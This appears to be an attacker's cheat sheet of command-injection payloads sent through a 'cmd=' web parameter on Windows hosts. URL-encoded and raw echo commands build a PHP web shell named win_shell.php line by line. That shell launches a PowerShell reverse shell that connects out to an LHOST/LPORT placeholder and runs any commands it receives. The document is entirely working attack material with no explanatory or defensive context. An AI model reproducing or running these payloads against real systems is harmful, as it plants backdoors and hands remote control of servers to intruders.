  pwd:
cmd=echo%20\%cd\%

  create file:
cmd=copy NUL [filename]
cmd=copy NUL win_shell.php

  append shellcode into file:
cmd=echo%20%5E%3C?php%20%3E%3E%20[filename]
cmd=echo%20system('powershell%20-nop%20-c%20%22$client%20=%20New-Object%20System.Net.Sockets.TCPClient(%5C'LHOST%5C',LPORT);$stream%20=%20$client.GetStream();%5Bbyte%5B%5D%5D$bytes%20=%200..65535%7C%25%7B0%7D;while(($i%20=%20$stream.Read($bytes,%200,%20$bytes.Length))%20-ne%200)%7B;$data%20=%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes,0,%20$i);$sendback%20=%20(iex%20$data%202%3E&1%20%7C%20Out-String%20);$sendback2%20=%20$sendback%20+%20%5C'PS%20%5C'%20+%20(pwd).Path%20+%20%5C'%3E%20%5C';$sendbyte%20=%20(%5Btext.encoding%5D::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()%7D;$client.Close()%22');%20%3E%3E%20[filename]%0D%0A
cmd=echo%20?%5E%3E%20%3E%3E%20[filename]


  append shellcode into file (raw):
echo ^<?php >> [file]
echo $str = "powershell -nop -c  >> [file]
echo \"\$client = New-Object System.Net.Sockets. >> [file]
echo TCPClient('[LHOST]',[LPORT]); >> [file]
echo \$stream = \$client.GetStream(); >> [file]
echo [byte[]]\$bytes = 0..65535|%{0}; >> [file]
echo while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; >> [file]
echo \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); >> [file]
echo \$sendback = (iex \$data 2^>&1 | Out-String ); >> [file]
echo \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '^> '; >> [file]
echo \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); >> [file]
echo \$stream.Write(\$sendbyte,0,\$sendbyte.Length); >> [file]
echo \$stream.Flush()};\$client.Close()\""; >> [file]
echo $str = str_replace("\n", "", $str); >> [file]
echo system($str); >> [file]
echo ?^>  >> [file]



echo ^<?php >> win_shell.php
echo $str = "powershell -nop -c  >> win_shell.php
echo \"\$client = New-Object System.Net.Sockets. >> win_shell.php
echo TCPClient('[LHOST]',[LPORT]); >> win_shell.php
echo \$stream = \$client.GetStream(); >> win_shell.php
echo [byte[]]\$bytes = 0..65535|%{0}; >> win_shell.php
echo while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; >> win_shell.php
echo \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); >> win_shell.php
echo \$sendback = (iex \$data 2^>&1 | Out-String ); >> win_shell.php
echo \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '^> '; >> win_shell.php
echo \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); >> win_shell.php
echo \$stream.Write(\$sendbyte,0,\$sendbyte.Length); >> win_shell.php
echo \$stream.Flush()};\$client.Close()\""; >> win_shell.php
echo $str = str_replace("\n", "", $str); >> win_shell.php
echo system($str); >> win_shell.php
echo ?^>  >> win_shell.php


  